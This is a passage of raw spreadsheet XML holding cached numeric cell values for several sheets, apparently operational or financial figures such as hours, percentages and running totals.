          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>72.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5553.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>43.047619047619</v>
          </cell>
          <cell r="V69">
            <v>67.8543499511241</v>
          </cell>
          <cell r="W69">
            <v>24.309861373661</v>
          </cell>
          <cell r="X69">
            <v>22.9287791466187</v>
          </cell>
          <cell r="Y69">
            <v>25.34432105898</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.33</v>
          </cell>
          <cell r="R71" t="str">
            <v>71.67</v>
          </cell>
          <cell r="S71" t="str">
            <v>4098.17</v>
          </cell>
          <cell r="T71">
            <v>34.7083333333333</v>
          </cell>
          <cell r="U71">
            <v>42.6607142857143</v>
          </cell>
          <cell r="V71">
            <v>50.0753910068426</v>
          </cell>
          <cell r="W71">
            <v>223.049219687875</v>
          </cell>
          <cell r="X71">
            <v>222.185014650481</v>
          </cell>
          <cell r="Y71">
            <v>213.652374108444</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>8.50</v>
          </cell>
          <cell r="R72" t="str">
            <v>75.50</v>
          </cell>
          <cell r="S72" t="str">
            <v>4144.00</v>
          </cell>
          <cell r="T72">
            <v>35.4166666666667</v>
          </cell>
          <cell r="U72">
            <v>44.9404761904762</v>
          </cell>
          <cell r="V72">
            <v>50.6353861192571</v>
          </cell>
          <cell r="W72">
            <v>59.6470588235294</v>
          </cell>
          <cell r="X72">
            <v>65.3112582781457</v>
          </cell>
          <cell r="Y72">
            <v>61.3576254826255</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>8.50</v>
          </cell>
          <cell r="R73" t="str">
            <v>75.50</v>
          </cell>
          <cell r="S73" t="str">
            <v>4271.72</v>
          </cell>
          <cell r="T73">
            <v>35.4166666666667</v>
          </cell>
          <cell r="U73">
            <v>44.9404761904762</v>
          </cell>
          <cell r="V73">
            <v>52.1959921798631</v>
          </cell>
          <cell r="W73">
            <v>63.4117647058824</v>
          </cell>
          <cell r="X73">
            <v>64.887417218543</v>
          </cell>
          <cell r="Y73">
            <v>62.9515160169674</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="7">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>854</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>7361.736</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6202</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>4120</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>63424.616</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>5568</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>4624.68</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>56533.44</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>142.38</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>7049.4</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>2021</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>321.48</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>20079.92</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>3547</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3791.32</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>12866.39</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>369.5</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>16537.73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202</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>2433.297</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>106.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>5841.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>55.2083333333333</v>
          </cell>
          <cell r="V68">
            <v>71.1687378167641</v>
          </cell>
          <cell r="W68">
            <v>258.416666666667</v>
          </cell>
          <cell r="X68">
            <v>257.490566037736</v>
          </cell>
          <cell r="Y68">
            <v>266.220835979615</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>96.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5577.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>50.1666666666667</v>
          </cell>
          <cell r="V69">
            <v>67.948343079922</v>
          </cell>
          <cell r="W69">
            <v>24.011609158336</v>
          </cell>
          <cell r="X69">
            <v>23.1961775831177</v>
          </cell>
          <cell r="Y69">
            <v>25.3387923041439</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>15.67</v>
          </cell>
          <cell r="R71" t="str">
            <v>87.33</v>
          </cell>
          <cell r="S71" t="str">
            <v>4113.83</v>
          </cell>
          <cell r="T71">
            <v>65.2916666666667</v>
          </cell>
          <cell r="U71">
            <v>45.484375</v>
          </cell>
          <cell r="V71">
            <v>50.119761208577</v>
          </cell>
          <cell r="W71">
            <v>226.35609444799</v>
          </cell>
          <cell r="X71">
            <v>222.958891560747</v>
          </cell>
          <cell r="Y71">
            <v>213.701283232414</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>16.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>91.50</v>
          </cell>
          <cell r="S72" t="str">
            <v>4160.00</v>
          </cell>
          <cell r="T72">
            <v>66.6666666666667</v>
          </cell>
          <cell r="U72">
            <v>47.65625</v>
          </cell>
          <cell r="V72">
            <v>50.682261208577</v>
          </cell>
          <cell r="W72">
            <v>61.1875</v>
          </cell>
          <cell r="X72">
            <v>64.5901639344262</v>
          </cell>
          <cell r="Y72">
            <v>61.3569711538462</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>16.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>91.50</v>
          </cell>
          <cell r="S73" t="str">
            <v>4287.72</v>
          </cell>
          <cell r="T73">
            <v>66.6666666666667</v>
          </cell>
          <cell r="U73">
            <v>47.65625</v>
          </cell>
          <cell r="V73">
            <v>52.2383040935673</v>
          </cell>
          <cell r="W73">
            <v>65.125</v>
          </cell>
          <cell r="X73">
            <v>64.9289617486339</v>
          </cell>
          <cell r="Y73">
            <v>62.9596265614359</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="8">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>836</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>6525.736</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6519</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>4958</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>64985.616</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>6482</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5148.04</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>57867.4</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>192.36</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>6857.04</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>263.82</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>19816.1</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>6482</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4366.86</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>14981.53</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>325</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>16212.73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1320.16</v>
          </cell>
        </row>
        <row r="29">
          <cell r="V29">
            <v>223</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>3530.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>130.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>5865.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>60.1851851851852</v>
          </cell>
          <cell r="V68">
            <v>71.2527939747327</v>
          </cell>
          <cell r="W68">
            <v>271.625</v>
          </cell>
          <cell r="X68">
            <v>260.1</v>
          </cell>
          <cell r="Y68">
            <v>266.242948207579</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>120.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5601.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>55.7037037037037</v>
          </cell>
          <cell r="V69">
            <v>68.041788143829</v>
          </cell>
          <cell r="W69">
            <v>22.9391010891241</v>
          </cell>
          <cell r="X69">
            <v>23.1432003540494</v>
          </cell>
          <cell r="Y69">
            <v>25.3283737849622</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>13.92</v>
          </cell>
          <cell r="R71" t="str">
            <v>101.25</v>
          </cell>
          <cell r="S71" t="str">
            <v>4127.75</v>
          </cell>
          <cell r="T71">
            <v>58</v>
          </cell>
          <cell r="U71">
            <v>46.875</v>
          </cell>
          <cell r="V71">
            <v>50.1427356656949</v>
          </cell>
          <cell r="W71">
            <v>242.241379310345</v>
          </cell>
          <cell r="X71">
            <v>225.60987654321</v>
          </cell>
          <cell r="Y71">
            <v>213.797528920114</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>115.50</v>
          </cell>
          <cell r="S72" t="str">
            <v>4184.00</v>
          </cell>
          <cell r="T72">
            <v>100</v>
          </cell>
          <cell r="U72">
            <v>53.4722222222222</v>
          </cell>
          <cell r="V72">
            <v>50.8260447035957</v>
          </cell>
          <cell r="W72">
            <v>66.5416666666667</v>
          </cell>
          <cell r="X72">
            <v>64.995670995671</v>
          </cell>
          <cell r="Y72">
            <v>61.3867112810707</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>115.50</v>
          </cell>
          <cell r="S73" t="str">
            <v>4311.72</v>
          </cell>
          <cell r="T73">
            <v>100</v>
          </cell>
          <cell r="U73">
            <v>53.4722222222222</v>
          </cell>
          <cell r="V73">
            <v>52.3775510204082</v>
          </cell>
          <cell r="W73">
            <v>63.0416666666667</v>
          </cell>
          <cell r="X73">
            <v>64.5367965367965</v>
          </cell>
          <cell r="Y73">
            <v>62.9600832150511</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="9">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>626.88</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>829</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>6323.616</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6563</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>4792</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>66756.616</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>6976</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>4048.39</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>60795.01</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>186.74</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>6670.3</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>352.44</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>19463.66</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>5571</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3009.21</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>17543.32</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>1405</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>500</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>17117.73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265</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>3265.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>154.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>5889.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>64.1666666666667</v>
          </cell>
          <cell r="V68">
            <v>71.3363614341085</v>
          </cell>
          <cell r="W68">
            <v>273.458333333333</v>
          </cell>
          <cell r="X68">
            <v>262.181818181818</v>
          </cell>
          <cell r="Y68">
            <v>266.272351104418</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>144.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5625.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>60.1333333333333</v>
          </cell>
          <cell r="V69">
            <v>68.1346899224806</v>
          </cell>
          <cell r="W69">
            <v>22.7100411397227</v>
          </cell>
          <cell r="X69">
            <v>23.0687750346886</v>
          </cell>
          <cell r="Y69">
            <v>25.3169790887452</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>125.25</v>
          </cell>
          <cell r="S71" t="str">
            <v>4151.75</v>
          </cell>
          <cell r="T71">
            <v>100</v>
          </cell>
          <cell r="U71">
            <v>52.1875</v>
          </cell>
          <cell r="V71">
            <v>50.2876695736434</v>
          </cell>
          <cell r="W71">
            <v>205.916666666667</v>
          </cell>
          <cell r="X71">
            <v>221.836327345309</v>
          </cell>
          <cell r="Y71">
            <v>213.751972059975</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>15.17</v>
          </cell>
          <cell r="R72" t="str">
            <v>130.67</v>
          </cell>
          <cell r="S72" t="str">
            <v>4199.17</v>
          </cell>
          <cell r="T72">
            <v>63.2083333333333</v>
          </cell>
          <cell r="U72">
            <v>54.4458333333333</v>
          </cell>
          <cell r="V72">
            <v>50.8620397286822</v>
          </cell>
          <cell r="W72">
            <v>70.4680290046144</v>
          </cell>
          <cell r="X72">
            <v>65.6309788015612</v>
          </cell>
          <cell r="Y72">
            <v>61.4195186191557</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>15.17</v>
          </cell>
          <cell r="R73" t="str">
            <v>130.67</v>
          </cell>
          <cell r="S73" t="str">
            <v>4326.88</v>
          </cell>
          <cell r="T73">
            <v>63.2083333333333</v>
          </cell>
          <cell r="U73">
            <v>54.4458333333333</v>
          </cell>
          <cell r="V73">
            <v>52.4089147286822</v>
          </cell>
          <cell r="W73">
            <v>63.6123928806856</v>
          </cell>
          <cell r="X73">
            <v>64.4294788398255</v>
          </cell>
          <cell r="Y73">
            <v>62.962515715712</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="10">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>1659.1</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>831</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>7151.716</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6610</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>5531</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>67835.616</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>7968</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>4739.2</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>64023.81</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>390.66</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>6279.64</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>378.02</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>19085.64</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>3928</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3477.52</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>17993.8</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>4040</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>493</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>20664.73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301</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>2964.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>178.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>5913.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>67.4242424242424</v>
          </cell>
          <cell r="V68">
            <v>71.4194444444445</v>
          </cell>
          <cell r="W68">
            <v>275.416666666667</v>
          </cell>
          <cell r="X68">
            <v>263.966292134831</v>
          </cell>
          <cell r="Y68">
            <v>266.309463214019</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>168.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5649.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>63.7575757575758</v>
          </cell>
          <cell r="V69">
            <v>68.2270531400966</v>
          </cell>
          <cell r="W69">
            <v>21.9733736762481</v>
          </cell>
          <cell r="X69">
            <v>22.9071796817462</v>
          </cell>
          <cell r="Y69">
            <v>25.3023878343866</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>149.25</v>
          </cell>
          <cell r="S71" t="str">
            <v>4175.75</v>
          </cell>
          <cell r="T71">
            <v>100</v>
          </cell>
          <cell r="U71">
            <v>56.5340909090909</v>
          </cell>
          <cell r="V71">
            <v>50.4317632850242</v>
          </cell>
          <cell r="W71">
            <v>208.208333333333</v>
          </cell>
          <cell r="X71">
            <v>219.644891122278</v>
          </cell>
          <cell r="Y71">
            <v>213.720110159852</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>154.67</v>
          </cell>
          <cell r="S72" t="str">
            <v>4223.17</v>
          </cell>
          <cell r="T72">
            <v>100</v>
          </cell>
          <cell r="U72">
            <v>58.5871212121212</v>
          </cell>
          <cell r="V72">
            <v>51.0044685990338</v>
          </cell>
          <cell r="W72">
            <v>66.375</v>
          </cell>
          <cell r="X72">
            <v>65.7464278787095</v>
          </cell>
          <cell r="Y72">
            <v>61.4476802970281</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>154.67</v>
          </cell>
          <cell r="S73" t="str">
            <v>4350.88</v>
          </cell>
          <cell r="T73">
            <v>100</v>
          </cell>
          <cell r="U73">
            <v>58.5871212121212</v>
          </cell>
          <cell r="V73">
            <v>52.5468599033817</v>
          </cell>
          <cell r="W73">
            <v>57.4166666666667</v>
          </cell>
          <cell r="X73">
            <v>63.3413072994117</v>
          </cell>
          <cell r="Y73">
            <v>62.9319241165006</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="11">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>1643.7</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>806</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>7989.416</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6569</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>3539</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>69460.016</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>4727</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>3673.14</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>65077.67</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>1076</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>194.06</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>7161.58</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>381.44</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>18704.2</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>3651</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>2650.64</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>18994.16</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>447</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>20217.73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1046.66</v>
          </cell>
        </row>
        <row r="29">
          <cell r="V29">
            <v>191</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>3820.117</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>1405.6</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>202.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>5937.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>70.1388888888889</v>
          </cell>
          <cell r="V68">
            <v>71.5020472061657</v>
          </cell>
          <cell r="W68">
            <v>273.708333333333</v>
          </cell>
          <cell r="X68">
            <v>265.123762376238</v>
          </cell>
          <cell r="Y68">
            <v>266.339370074762</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>192.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5673.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>66.7777777777778</v>
          </cell>
          <cell r="V69">
            <v>68.3188824662813</v>
          </cell>
          <cell r="W69">
            <v>21.1773481504034</v>
          </cell>
          <cell r="X69">
            <v>22.6860012457178</v>
          </cell>
          <cell r="Y69">
            <v>25.2845753646285</v>
          </cell>
        </row>
